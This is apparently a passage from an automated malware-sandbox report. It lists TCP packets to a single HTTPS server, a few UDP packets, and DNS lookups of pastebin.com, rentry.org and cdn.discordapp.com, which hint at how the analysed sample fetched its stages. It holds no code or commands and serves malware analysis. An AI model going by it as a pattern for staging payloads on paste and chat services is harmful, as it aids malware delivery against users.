                                                                              Oct 31, 2024 07:43:16.508305073 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.510068893 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.510078907 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.510304928 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.511320114 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.559335947 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.664830923 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665088892 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665136099 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.665163040 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665244102 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665286064 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.665293932 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665401936 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665450096 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.665456057 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665549040 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.665586948 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.665594101 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.717232943 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.717252970 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.764106035 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.783482075 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.783699036 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.783755064 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.783771038 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.783878088 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.783943892 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.783951044 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784044027 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784100056 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.784106016 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784188986 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784326077 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.784332037 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784702063 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784746885 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.784754038 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784852028 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.784894943 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.784900904 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.785499096 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.785548925 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.785554886 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.785645008 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.785742998 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.785748959 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.826626062 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.902524948 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.902688026 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.902789116 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.902801037 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.902817011 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.902936935 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.902983904 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.902993917 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903028965 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.903040886 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903206110 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903249979 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.903256893 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903369904 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903448105 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903454065 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.903475046 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.903553963 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.903559923 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.946028948 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.946120977 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:16.946151018 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:16.998503923 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.021401882 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.021421909 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.021498919 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.021539927 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.021557093 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.021594048 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.021867990 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.021884918 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.021920919 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.021972895 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.022022009 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.022030115 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.022490025 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.022551060 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.022557020 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.022682905 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.022732973 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.022738934 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.024324894 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.064656973 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.064737082 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.140225887 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.140301943 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.140686989 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.140748978 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.140790939 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.140840054 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.141083956 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.141134977 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.141527891 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.141587019 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.183947086 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.184046984 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.259231091 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.259305000 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.259413004 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.259474039 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.259660959 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.259718895 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.260046005 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.260104895 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.260132074 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.260190964 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.260620117 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.260674953 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.302683115 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.302757978 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.378135920 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.378201008 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.378259897 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.378321886 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.378345013 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.378400087 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.378889084 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.378952980 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.379398108 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.379456997 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.379534960 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.379584074 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.421752930 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.421844006 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.421843052 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.421869993 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.421899080 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.421916962 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.497014999 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.497097969 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.497399092 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.497454882 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.497659922 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.497705936 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.498197079 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.498271942 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.498444080 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.498492956 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.498568058 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.498615026 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.540775061 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.540848017 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.615864038 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.615941048 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.615957975 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.615981102 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.616004944 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.616024017 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.616204023 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.616257906 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.616463900 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.616527081 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.617511034 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.617530107 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.617563963 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.617605925 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.617616892 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.617643118 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.669621944 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743119001 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743158102 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743197918 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743227959 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743237972 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743249893 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743253946 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743269920 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743308067 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743570089 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743630886 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743650913 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743657112 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.743745089 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.743818045 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.853781939 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.853847980 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.853925943 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.853926897 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.853944063 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.854001045 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.862488985 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.862530947 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.862564087 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.862577915 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.862611055 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.862618923 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.897541046 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.897584915 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.897623062 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.897640944 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.897672892 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.897687912 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.981045961 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.981096029 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.981206894 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.981206894 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:17.981236935 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:17.981301069 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.016422033 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.016463995 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.016527891 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.016544104 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.016557932 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.016592979 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.099921942 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.099972010 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.100049973 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.100065947 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.100100040 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.100100040 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.100702047 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.100747108 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.100805998 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.100805998 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.100811958 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.100924015 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.210836887 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.210881948 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.210918903 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.210936069 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.210968018 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.211023092 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.219218016 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.219261885 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.219297886 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.219309092 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.219356060 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.219377041 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.219996929 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.220037937 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.220077038 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.220083952 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.220114946 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.220114946 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.329817057 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.329885006 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.330007076 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.330008030 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.330039978 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.332329988 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.338617086 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.338661909 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.338715076 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.338722944 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.338754892 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.338784933 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.373287916 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.373348951 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.373409033 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.373430014 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.373579025 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.373735905 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.456681013 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.456729889 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.456789017 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.456808090 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.456855059 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.456855059 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.458087921 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.458132029 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.458182096 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.458194017 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.458208084 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.458239079 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.492353916 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.492399931 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.492475033 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.492475033 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.492487907 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.497219086 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.575556993 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.575581074 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.575658083 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.575674057 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.575711012 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.575711012 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.576673031 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.576689005 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.576747894 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.576754093 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.578355074 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.611268997 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.611287117 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.611474037 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.611486912 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.611593962 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871217012 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871273994 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871320009 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871336937 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871355057 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871375084 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871468067 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871511936 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871541023 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871546030 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871581078 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871599913 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871604919 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871634007 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871670008 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871742964 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871746063 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871767998 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.871799946 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.871824980 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.872102976 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.872235060 CET44349756162.159.135.233192.168.2.6
                                                                              Oct 31, 2024 07:43:18.872298956 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.878659010 CET49756443192.168.2.6162.159.135.233
                                                                              Oct 31, 2024 07:43:18.878674030 CET44349756162.159.135.233192.168.2.6

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 31, 2024 07:43:03.509572029 CET6230653192.168.2.61.1.1.1
                                                                              Oct 31, 2024 07:43:03.516382933 CET53623061.1.1.1192.168.2.6
                                                                              Oct 31, 2024 07:43:08.324105024 CET5059453192.168.2.61.1.1.1
                                                                              Oct 31, 2024 07:43:08.331690073 CET53505941.1.1.1192.168.2.6
                                                                              Oct 31, 2024 07:43:15.873544931 CET5545453192.168.2.61.1.1.1
                                                                              Oct 31, 2024 07:43:15.880495071 CET53554541.1.1.1192.168.2.6
                                                                              Oct 31, 2024 07:43:19.695804119 CET53555181.1.1.1192.168.2.6

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 31, 2024 07:43:03.509572029 CET192.168.2.61.1.1.10x45e6Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:08.324105024 CET192.168.2.61.1.1.10x990bStandard query (0)rentry.orgA (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 07:43:15.873544931 CET192.168.2.61.1.1.10x8903Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

